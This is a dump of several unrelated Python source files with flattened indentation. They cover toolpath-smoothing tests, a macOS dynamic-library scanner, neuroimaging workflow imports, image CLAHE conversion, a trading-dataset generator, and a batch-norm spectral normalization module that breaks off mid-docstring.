checker.check_line_start_point_middle()
elif start == "end":
checker.check_line_start_point_end()
else:
assert False, "Invalid start type"
if start == "start" and end == "end":
checker.check_point_on_middle_of_line()
else:
checker.check_point_on_line()
if end == "end":
checker.check_end_point_end()
elif end == "on":
checker.check_end_point_on()
elif end == "middle":
checker.check_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def corner_segment(data, l, s, start, end):
checker = SegmentChecker(data, l, s, start, end, True)
checker.check_corner_spline_order()
if start == "on":
checker.check_start_point_on()
elif start == "middle":
checker.check_line_start_point_middle()
else:
assert False, "Invalid start type"
if start == "middle" or end == "middle":
checker.check_corner_middle_normal()
else:
checker.check_corner_middle_short()
if end == "on":
checker.check_corner_end_point_on()
elif end == "middle":
checker.check_corner_end_point_middle()
else:
assert False, "Invalid end type"
checker.check_continuity()
def check_distances(data):
t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10)
assert_array_almost_equal(data.smoothed_toolpath.distance(t),
np.linspace(0, data.smoothed_toolpath.total_distance(), 10))
def test_straight_line(plotter):
data = generate_curves([
"G1 X100 Y200"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 1
straight_segment(data, l=0, s=0, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) ==\
pytest.approx(np.linalg.norm([100, 200]))
check_distances(data)
plotter(data)
def test_two_straight_lines(plotter):
data = generate_curves([
"G1 X50 Y50",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 2
straight_segment(data, l=0, s=0, start="start", end="end")
straight_segment(data, l=1, s=1, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(
np.linalg.norm([50, 50]) + np.linalg.norm([50, 50])
)
check_distances(data)
plotter(data)
def test_90_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0
assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)
check_distances(data)
plotter(data)
def test_45_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_acute_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner_counter_clockwise(plotter):
data = generate_curves([
"G1 X-100 Y-100",
"G1 X-200 Y-100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_obtuse_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_shorter_and_longer_line(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X30 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_longer_and_shorter_line(plotter):
data = generate_curves([
"G1 X20 Y0",
"G1 X30 Y-0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="on")
corner_segment(data, l=1, s=3, start="on", end="on")
straight_segment(data, l=2, s=4, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
def test_three_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1",
"G1 X30 Y0.3"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
# Note that this line is very short
straight_segment(data, l=1, s=2, start="middle", end="middle")
corner_segment(data, l=1, s=3, start="middle", end="middle")
straight_segment(data, l=2, s=4, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) <\
10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines_with_z_move(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 Z10",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
straight_segment(data, l=1, s=3, start="end", end="end")
straight_segment(data, l=3, s=4, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
| 2.15625 | 2 |
appify/scan.py | akx/appify | 0 | 12796576 | import subprocess
import threading
from collections import defaultdict
from concurrent.futures import Executor
from concurrent.futures.thread import ThreadPoolExecutor
class RecursiveLibraryScanner:
def __init__(self, executor: Executor, scan_private: bool):
self.executor = executor
self.libraries = defaultdict(set)
self.scanned = set()
self.scan_private = scan_private
self.jobs = []
self.all_done = threading.Event()
def _check(self, job):
if all(j.done() for j in self.jobs):
self.all_done.set()
def _enqueue(self, target):
job = self.executor.submit(self._scan, target)
job.add_done_callback(self._check)
self.jobs.append(job)
def _scan(self, target):
# print("scanning", target, file=sys.stderr)
self.scanned.add(target)
for lib in scan_libraries(target):
self.libraries[target].add(lib)
if lib not in self.scanned:
is_private = smells_private(lib)
if (is_private and self.scan_private) or not is_private:
self._enqueue(lib)
def scan(self, target):
self._enqueue(target)
self.all_done.wait()
return self.libraries
def scan_libraries_recursive(initial_target, scan_private=True):
with ThreadPoolExecutor() as executor:
rls = RecursiveLibraryScanner(executor, scan_private=scan_private)
return rls.scan(initial_target)
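# scan_libraries() below parses `otool -l` output, which lists load commands roughly as:
#
#   Load command 12
#             cmd LC_LOAD_DYLIB
#         cmdsize 56
#            name /usr/lib/libSystem.B.dylib (offset 24)
#
# Only the stripped "cmd LC_LOAD_DYLIB" / "name ..." lines are consumed. The excerpt
# above is an illustrative assumption of the format, not output captured for this repo.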
def scan_libraries(target):
in_load_dylib = False
libraries = set()
for line in subprocess.check_output(
["otool", "-l", target], encoding="utf-8"
).splitlines():
line = line.strip()
if line == "cmd LC_LOAD_DYLIB":
in_load_dylib = True
if in_load_dylib and line.startswith("name "):
words = line.split()
lib = words[1]
libraries.add(lib)
in_load_dylib = False
return libraries
def smells_private(lib):
if lib.startswith("/System/Library"):
return True
if lib.startswith("/usr/lib/"):
return True
if lib.startswith("/usr/local/lib/"):
return True
return False
def filter_private(scanned_libraries):
public_libraries = {
target: {lib for lib in libraries if not smells_private(lib)}
for (target, libraries) in scanned_libraries.items()
if not smells_private(target)
}
return public_libraries
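if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module). It assumes macOS with
    # `otool` on PATH; the default binary path is a placeholder, not a tested target.
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/true"
    libs = scan_libraries_recursive(target, scan_private=False)
    for binary, deps in filter_private(libs).items():
        print(binary, "->", sorted(deps))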
| 2.5625 | 3 |
aslprep/workflows/asl/__init__.py | lawlessrd/aslprep | 2 | 12796577 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Pre-processing ASL - ASL signal workflows
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. automodule:: aslprep.workflows.asl.base
.. automodule:: aslprep.workflows.asl.hmc
.. automodule:: aslprep.workflows.asl.stc
.. automodule:: aslprep.workflows.asl.t2s
.. automodule:: aslprep.workflows.asl.registration
.. automodule:: aslprep.workflows.asl.resampling
.. automodule:: aslprep.workflows.asl.confounds
.. automodule:: aslprep.workflows.asl.cbf
"""
from .base import init_asl_preproc_wf
from .gecbf import init_asl_gepreproc_wf
from .hmc import init_asl_hmc_wf
from .stc import init_asl_stc_wf
from .t2s import init_asl_t2s_wf
from .registration import (
init_asl_t1_trans_wf,
init_asl_reg_wf,
)
from .resampling import (
init_asl_std_trans_wf,
init_asl_surf_wf,
init_asl_preproc_trans_wf,
)
from .confounds import (
init_asl_confs_wf
)
from .cbf import (
init_cbf_compt_wf,
init_cbfqc_compt_wf,
init_cbfplot_wf,
init_gecbfplot_wf,
init_cbfroiquant_wf,
init_gecbf_compt_wf,
init_cbfgeqc_compt_wf)
from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf,
init_asl_t1_getrans_wf,init_asl_gestd_trans_wf)
__all__ = [
'init_asl_confs_wf',
'init_gecbf_compt_wf',
'init_asl_t1_getrans_wf',
'init_asl_geref_wf',
'init_asl_gereg_wf',
'init_asl_gestd_trans_wf',
'init_asl_hmc_wf',
'init_asl_std_trans_wf',
'init_asl_preproc_trans_wf',
'init_asl_reg_wf',
'init_asl_stc_wf',
'init_asl_surf_wf',
'init_asl_t1_trans_wf',
'init_asl_t2s_wf',
'init_asl_preproc_wf',
'init_cbf_compt_wf',
'init_cbfqc_compt_wf',
'init_cbfplot_wf',
'init_cbfroiquant_wf',
'init_cbfgeqc_compt_wf'
]
| 1.953125 | 2 |
keepworking/settings.py | yelijing18/KeepWorking | 0 | 12796578 | <gh_stars>0
# -*- coding: utf-8 -*-
from decouple import config
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv('.env', usecwd=True))
load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True))
COUNTDOWN = config('COUNTDOWN', default=5, cast=int)
EVENT_INTERVAL = config('EVENT_INTERVAL', default=1, cast=int)
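# Illustrative .env overrides for the two settings above (values shown are just the
# defaults this module already falls back to; any integers are accepted):
#   COUNTDOWN=5
#   EVENT_INTERVAL=1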
| 1.5 | 2 |
convert_png_images_using_clahe.py | tybrad11/kaggle_ich | 0 | 12796579 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 21 14:21:03 2019
@author: tjb129
"""
import numpy as np
from PIL import Image
from skimage.exposure import equalize_adapthist
import os
from matplotlib import pyplot as plt
parent = '/data/Kaggle'
folders = [ 'pos-all-png',
'test-png',
'train-png',
'neg-filt-png',
'pos-filt-png']
for dir_i in folders:
dir_i = os.path.join(parent, dir_i)
save_dir = dir_i + '-clahe'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
for f in os.listdir(dir_i):
fname = os.fsdecode(f)
if fname.endswith(".png"):
im = np.array(Image.open(os.path.join(dir_i, fname)))
if len(im.shape) > 2:
im = im[..., 0]
im = im.astype(np.float)
# normalize to [0,1]
im /= 255.
im = equalize_adapthist(im)
im = np.uint8(im*255)
im2 = Image.fromarray(im)
im2.save(os.path.join(save_dir, fname))
| 2.203125 | 2 |
datamodeling/dscreator.py | AI-Traiding-Team/paired_trading | 1 | 12796580 | <reponame>AI-Traiding-Team/paired_trading
import os
import sys
import time
import copy
import pytz
import numpy as np
import datetime
import pandas as pd
from typing import Tuple
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import FunctionTransformer
from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
from dataclasses import dataclass
from analyze.dataload import DataLoad
from datamodeling.datafeatures import DataFeatures, DSProfile
__version__ = 0.0010
def get_local_timezone_name():
if time.daylight:
offset_hour = time.altzone / 3600
else:
offset_hour = time.timezone / 3600
offset_hour_msg = f"{offset_hour:.0f}"
if offset_hour > 0:
offset_hour_msg = f"+{offset_hour:.0f}"
return f'Etc/GMT{offset_hour_msg}'
class TSDataGenerator(TimeseriesGenerator):
def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None,
shuffle=False, reverse=False, batch_size=128):
super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse,
batch_size)
if len(data) != len(targets):
raise ValueError('Data and targets have to be' +
' of same length. '
'Data length is {}'.format(len(data)) +
' while target length is {}'.format(len(targets)))
if overlap >= length:
raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed')
if overlap > 0:
start_index += overlap
self.data = data
self.targets = targets
self.length = length
self.sampling_rate = sampling_rate
self.stride = stride
self.start_index = start_index + length
self.overlap = overlap
if end_index is None:
end_index = len(data) - 1
self.end_index = end_index
self.shuffle = shuffle
self.reverse = reverse
self.batch_size = batch_size
self.sample_shape = None
if self.start_index > self.end_index:
raise ValueError('`start_index+length=%i > end_index=%i` '
'is disallowed, as no part of the sequence '
'would be left to be used as current step.'
% (self.start_index, self.end_index))
self.sample_shape = self.calc_shape()
pass
def calc_shape(self):
index = 0
i = (self.start_index + self.batch_size * self.stride * index)
rows = np.arange(i, min(i + self.batch_size *
self.stride, self.end_index + 1), self.stride)
samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]
for row in rows])
# self.sample_shape = np.expand_dims(samples, axis=0).shape
sample_shape = (samples.shape[-2], samples.shape[-1],)
return sample_shape
def __getitem__(self, index):
if self.shuffle:
rows = np.random.randint(
self.start_index, self.end_index + 1, size=self.batch_size)
else:
i = (self.start_index + self.batch_size * self.stride * index)
rows = np.arange(i, min(i + self.batch_size *
self.stride, self.end_index + 1), self.stride)
samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]
for row in rows])
# self.sample_shape = samples.shape
targets = np.array([self.targets[row] for row in rows])
if self.reverse:
return samples[:, ::-1, ...], targets
return samples, targets
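# Illustrative sketch (not part of the original module): slice a toy array with
# TSDataGenerator to see how `length` and `overlap` shape each sample window.
# The array sizes below are arbitrary assumptions chosen only for this demo.
if __name__ == "__main__":
    _demo_x = np.arange(200, dtype=float).reshape(100, 2)
    _demo_y = np.arange(100, dtype=float).reshape(100, 1)
    _demo_gen = TSDataGenerator(_demo_x, _demo_y, length=10, overlap=2, batch_size=16)
    _bx, _by = _demo_gen[0]
    print(_bx.shape, _by.shape, _demo_gen.sample_shape)  # (16, 12, 2) (16, 1) (12, 2)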
@dataclass
class DataSet:
def __init__(self):
self.name: str = ''
self.dataset_profile = DSProfile()
self.features_df = None
self.y_df = None
self.x_Train = None
self.y_Train = None
self.x_Val = None
self.y_Val = None
self.x_Test = None
self.y_Test = None
self.features_scaler = object
self.targets_scaler = object
self.train_gen = None
self.val_gen = None
self.test_gen = None
self.input_shape = None
pass
def get_train(self):
if (self.x_Train is not None) and (self.y_Train is not None):
return self.x_Train, self.y_Train
def get_val(self):
if (self.x_Val is not None) and (self.y_Val is not None):
return self.x_Val, self.y_Val
def get_test(self):
if (self.x_Test is not None) and (self.y_Test is not None):
return self.x_Test, self.y_Test
class DSCreator:
"""
    Class for dataset creation.
    Dataset configuration is provided through the DSProfile dataclass (profile).
"""
def __init__(self,
loader: DataLoad,
dataset_profile: DSProfile):
"""
        Receives an object with OHLCV data (symbols and timeframes).
        All data for the chosen period is loaded into memory.
Args:
loader (DataLoad): object with data
Returns:
DSCreator (class): object
"""
self.features = DataFeatures(loader)
self.dataset_profile = dataset_profile
self.dataset = DataSet()
def split_data_df(self):
df_rows = self.dataset.features_df.shape[0]
df_train_len = int(df_rows * self.dataset_profile.train_size)
df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)
self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :]
if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0:
self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :]
return df_train_len, df_val_len, None
else:
df_val_len = int(df_rows * self.dataset_profile.val_size)
df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes)
self.dataset.val_df = self.dataset.features_df.iloc[
df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes,
:]
self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :]
return df_train_len, df_val_len, df_test_len
def get_train_generator(self, x_Train_data, y_Train_data):
self.dataset.train_gen = TSDataGenerator(data=x_Train_data,
targets=y_Train_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.train_gen
def get_val_generator(self, x_Val_data, y_Val_data):
self.dataset.val_gen = TSDataGenerator(data=x_Val_data,
targets=y_Val_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.val_gen
def get_test_generator(self, x_Test_data, y_Test_data):
self.dataset.test_gen = TSDataGenerator(data=x_Test_data,
targets=y_Test_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.test_gen
def create_close1_close2_power(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def create_power_trend(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def create_close1_close2_trend(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def prepare_datagens(self, x_arr, y_arr):
train_len, val_len, test_len = self.split_data_df()
if test_len is None:
x_Train_data = x_arr[train_len:, :]
x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :]
y_Train_data = y_arr[train_len:, :]
y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :]
else:
x_Train_data = x_arr[train_len:, :]
x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]
x_Test_data = x_arr[x_arr.shape[0] - test_len:, :]
y_Train_data = y_arr[train_len:, :]
y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]
y_Test_data = y_arr[x_arr.shape[0] - test_len:, :]
x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)
""" Using generator 1 time to have solid data """
self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data)
# x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)
""" Using generator 1 time to have solid data """
x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data)
x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data)
self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data)
self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data)
self.dataset.input_shape = x_Val_gen.sample_shape
pass
def create_dataset(self) -> DataSet:
self.dataset.dataset_profile = DSProfile()
self.dataset.features_df = self.features.collect_features(self.dataset_profile)
self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'
if self.dataset_profile.Y_data == "close1-close2":
self.dataset.y_df = self.features.create_y_close1_close2_sub()
elif self.dataset_profile.Y_data == "close1-close2_trend":
self.dataset.y_df = self.features.create_y_close1_close2_sub_trend()
self.create_close1_close2_trend()
return self.dataset
elif self.dataset_profile.Y_data == "close1-close2_power":
self.dataset.y_df = self.features.create_y_close1_close2_sub_power()
self.create_close1_close2_power()
return self.dataset
elif self.dataset_profile.Y_data == "power_trend":
weight = self.dataset.dataset_profile.power_trend
self.dataset.y_df = self.features.create_power_trend(weight)
self.create_power_trend()
return self.dataset
else:
msg = "Error: Unknown dataset preparation type"
sys.exit(msg)
self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'
y_temp = self.dataset.y_df.values.reshape(-1, 1)
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = RobustScaler().fit(y_temp)
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.targets_scaler.transform(y_temp)
self.prepare_datagens(x_arr, y_arr)
return self.dataset
def create_data_from_gen(self, x_arr, y_arr):
gen = TSDataGenerator(data=x_arr,
targets=y_arr,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
batch_size=x_arr.shape[0]
)
for x_data, y_data in gen:
continue
return x_data, y_data
def save_dataset_arrays(self, path_filename):
pass
if __name__ == "__main__":
"""
Usage for DataLoad class
------------------------
pairs_symbol = None -> Use all pairs in timeframe directory
pairs_symbol = ("BTCUSDT", "ETHUSDT") -> Use only this pairs to load
time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols)
time_intervals = ['15m'] -> Use timeframes from this list to load
start_period = None -> Use from [0:] of historical data
start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex
end_period = None -> Use until [:-1] of historical data
end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex
source_directory="../source_root" -> Use this directory to search timeframes directory
"""
loaded_crypto_data = DataLoad(pairs_symbols=None,
time_intervals=['15m'],
source_directory="../source_root",
start_period='2021-11-01 00:00:00',
end_period='2021-12-05 23:59:59',
)
dataset_1_profile = DSProfile()
dsc = DSCreator(loaded_crypto_data,
dataset_1_profile)
dataset_1_cls = dsc.create_dataset()
| 2.078125 | 2 |
utils/bn_sn_chen.py | sebemery/Lipschitz-constrained-neural-networks | 0 | 12796581 | <reponame>sebemery/Lipschitz-constrained-neural-networks
"""
Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957
SN for batch normalization layers to be of Lipschitz constant sigma (default=1.0).
"""
import torch
from torch.nn.parameter import Parameter
class BatchNormSpectralNorm(object):
def __init__(self, name='weight', sigma=1.0, eps=1e-12):
self.name = name
self.sigma = sigma
self.eps = eps
def compute_weight(self, module):
weight = getattr(module, self.name + '_orig')
bias = getattr(module, "bias_orig")
running_var = getattr(module, "running_var")
with torch.no_grad():
cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var)))
# print(cur_sigma)
cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma)
# print(cur_sigma)
weight = weight / cur_sigma
bias = bias / cur_sigma
return weight, bias
def remove(self, module):
weight = getattr(module, self.name)
bias = getattr(module, "bias")
delattr(module, self.name)
delattr(module, self.name + '_orig')
delattr(module, "bias")
delattr(module, "bias_orig")
module.register_parameter(self.name, torch.nn.Parameter(weight.detach()))
module.register_parameter("bias", torch.nn.Parameter(bias.detach()))
def __call__(self, module, inputs):
if module.training:
weight, bias = self.compute_weight(module)
setattr(module, self.name, weight)
setattr(module, "bias", bias)
else:
weight_r_g = getattr(module, self.name + '_orig').requires_grad
bias_r_g = getattr(module, "bias_orig").requires_grad
getattr(module, self.name).detach_().requires_grad_(weight_r_g)
getattr(module, "bias").detach_().requires_grad_(bias_r_g)
@staticmethod
def apply(module, name, sigma, eps):
fn = BatchNormSpectralNorm(name, sigma, eps)
weight = module._parameters[name]
bias = module._parameters["bias"]
delattr(module, fn.name)
delattr(module, "bias")
module.register_parameter(fn.name + "_orig", weight)
module.register_parameter("bias_orig", bias)
# We still need to assign weight back as fn.name because all sorts of
# things may assume that it exists, e.g., when initializing weights.
# However, we can't directly assign as it could be an nn.Parameter and
# gets added as a parameter. Instead, we register weight.data as a
# buffer, which will cause weight to be included in the state dict
# and also supports nn.init due to shared storage.
module.register_buffer(fn.name, weight.data)
module.register_buffer("bias", bias.data)
module.register_forward_pre_hook(fn)
return fn
def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12):
r"""Applies spectral normalization to a parameter in the given module.
.. math::
\mathbf{W} &= \dfrac{\mathbf{W}}{\sigma(\mathbf{W})} \\
